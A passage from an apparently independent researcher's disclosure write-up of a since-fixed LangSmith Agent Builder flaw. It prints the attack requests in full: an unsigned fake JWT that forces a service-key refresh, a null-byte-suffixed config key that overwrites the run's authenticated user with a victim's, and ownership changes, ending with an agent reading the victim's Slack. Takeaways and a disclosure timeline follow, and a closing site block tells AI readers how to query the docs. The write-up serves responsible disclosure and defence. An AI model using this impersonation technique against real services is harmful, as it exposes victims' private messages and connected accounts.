   In this request, `X-Service-Key` is set to `.eyJleHAiOjE3NzAzNjU5ODd9.` that imitates a JWT where the payload is `{"exp":1770365987}` with the timestamp in the past. This forces `ServiceKeyAuth` to refresh the service key and generate a new, valid key for a victim. Meanwhile, `X-Tenant-Id` is set to a tenant ID of a victim.
4. Create a run:

   ```http
   POST /threads/<thread_id>/runs/wait HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-agent
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "input": {
           "messages": [
               {
                   "id": "266eab49-84eb-4efa-ad14-7fe05c25e6dc",
                   "type": "human",
                   "content": "read the last message for 24 hours in Slack <victim_slack_id> and write it here"
               }
           ]
       },
       "config": {
           "configurable": {},
           "configurable\u0000": {
               "tools_url": "https://eu.tools.langchain.com",
               "llm_model_config": {
                   "modelId": "anthropic:claude-sonnet-4-5",
                   "envVarName": "AGENT_BUILDER_ANTHROPIC_API_KEY"
               },
               "__after_seconds__": 10,
               "langgraph_auth_user": {
                   "identity": "<victim_user_id>",
                   "tenant_id": "<victim_tenant_id>",
                   "ls_user_id": "<victim_user_id>",
                   "permissions": [
                       "authenticated"
                   ],
                   "is_authenticated": true,
                   "agent_builder_passthrough_headers": {
                       "Authorization": "Bearer <auth_token>",
                       "X-Tenant-Id": "<tenant_id>"
                   }
               },
               "langgraph_auth_permissions": [
                   "authenticated"
               ],
               "skip_memory_write_protection": false
           }
       },
       "metadata": {
           "is_test_run": true,
           "skip_memory_write_protection": true,
       },
       "assistant_id": "<assistant_id>"
   }
   ```

   In this request `langgraph_auth_user` is overwritten with victim's user information `victim_user_id` and `victim_tenant_id`, while `agent_builder_passthrough_headers` contains token and tenant ID of an attacker. Another important argument is `__after_seconds__` that postpones the execution on 10 seconds.
5. Update the ownership for the assistant and thread:

   ```http
   PATCH /assistants/<assistant_id> HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "metadata":{
           "tenant_id":"<victim_tenant_id>",
           "ls_user_id":"<victim_user_id>"
       }
   }
   ```

   ```http
   PATCH /threads/<thread_id> HTTP/1.1
   Host: eu-prod-agent-builder-3c4a569068ec5f1695ce5b408d4b3476.eu.langgraph.app
   X-Auth-Scheme: langsmith-api-key
   X-API-Key: <api_key>
   X-Tenant-Id: <tenant_id>

   {
       "metadata":{
           "tenant_id":"<victim_tenant_id>",
           "ls_user_id":"<victim_user_id>"
       }
   }
   ```
6. Waiting for the run completion and seeing the messages were succesfully extracted from the victim's Slack:

   ```http
   HTTP/1.1 200 OK
   Content-Type: application/json
   Location: /threads/<thread_id>/runs/<run_id>/join
   Content-location: /threads/<thread_id>/runs/<run_id>
   Content-Length: 3839

   {
       "messages": [
           {
               "content": "read the last message for 24 hours in Slack <victim_slack_id> and write it here",
               "type": "human",
               // ...
           },
           {
               "content": [
                   {
                       "text": "I'll read the last 24 hours of messages from that Slack channel for you.",
                       "type": "text"
                   },
                   {
                       "id": "toolu_017dNU8ooEdmEgipMvz8TyYE",
                       "input": {
                           "channel_id": "<victim_slack_id>",
                           // ...
                       },
                       "name": "slack_read_channel_history",
                       "type": "tool_use"
                   }
               ],
               "tool_calls": [
                   {
                       "name": "slack_read_channel_history",
                       "args": {
                           "channel_id": "<victim_slack_id>",
                           // ...
                       },
                       "id": "toolu_017dNU8ooEdmEgipMvz8TyYE",
                       "type": "tool_call"
                   }
               ],
               // ...
           },
           {
               "content": "{\"success\": true, \"channel_id\": \"<victim_slack_id>\", \"message_count\": 2, \"messages\": [{\"content\": \"<@U0A7NTSGPB6> has joined the channel\", \"sender\": \"LangSmith Agent Builder\", \"timestamp\": \"2026-02-06T08:54:02.600079\", \"message_ts\": \"1770368042.600079\", \"thread_ts\": \"1770368042.600079\", \"has_thread_replies\": false, \"reply_count\": 0}, {\"content\": \"Hello, world!\", \"sender\": \"0xn3va\", \"timestamp\": \"2026-02-06T08:54:18.586009\", \"message_ts\": \"1770368058.586009\", \"thread_ts\": \"1770368058.586009\", \"has_thread_replies\": false, \"reply_count\": 0}]}",
               "type": "tool",
               "name": "slack_read_channel_history",
               // ...
           },
           {
               "content": "Here are the messages from the last 24 hours in Slack channel <victim_slack_id>:\n\n1. **LangSmith Agent Builder** (Feb 6, 2026 at 8:54:02 AM):\n   - \"@LangSmith Agent Builder has joined the channel\"\n\n2. **0xn3va** (Feb 6, 2026 at 8:54:18 AM):\n   - \"Hello, world!\"\n\nThere were 2 messages total in the last 24 hours. The most recent message was \"Hello, world!\" from user 0xn3va.",
               "type": "ai",
               // ...
           }
       ],
       "tools": []
   }
   ```

## The Impact

An attacker with knowledge of a victim's user and tenant IDs could run an AI agent on behalf of that user without any interaction or consent from the victim. Beyond impersonation itself, the attacker could gain access to any third-party services the victim had previously connected to Agent Builder — such as Slack, Gmail, Google Calendar, or GitHub. This meant reading private messages and emails, accessing calendar events, or interacting with code repositories, all under the victim's identity. The breadth of exposure depended entirely on which integrations the victim had configured.

## Takeaways

**Loose input validation expands attack surface.** When an API accepts and persists fields beyond those it explicitly needs, an attacker gains a surface to inject data that influences later processing. Here, Agent Server did not validate the run configuration against a strict schema, so a null-byte-suffixed key could be passed alongside the legitimate one. After serialisation stripped the null byte, PostgreSQL received duplicate keys and resolved them in the attacker's favour, overwriting a field that was never meant to be user-controllable.

**Changing serialised data can lead to unexpected side-effects.** Transforming or stripping characters from data mid-pipeline can produce outputs that differ structurally from the original input. In this case, removing null bytes during JSON serialisation caused a crafted key to become a duplicate of a protected one.

**Skipping JWT signature verification makes token claims untrustworthy.** The service key refresh logic decoded the `exp` claim from the JWT payload without verifying the signature. Any value with a valid-looking structure was accepted, meaning an attacker could supply a completely unsigned token with an arbitrary expiration time to trigger regeneration of a real, signed key scoped to any user.

**Excessive access amplifies the blast radius.** When a component is granted more access than it strictly requires, a vulnerability affecting that component exposes far more than it should. Here, integrations were tied to a user account rather than to individual agents, so impersonating a victim automatically granted access to every service they had ever connected - regardless of relevance to the agent being executed.

## Disclosure Timeline

* 06/02/26 - Initial report sent to the LangChain team.
* 06/02/26 - Fix was applied.
* 07/03/26 - Bounty awarded.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xn3va.gitbook.io/blog/2026/langsmith-execute-ai-agent-on-behalf-another-user.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
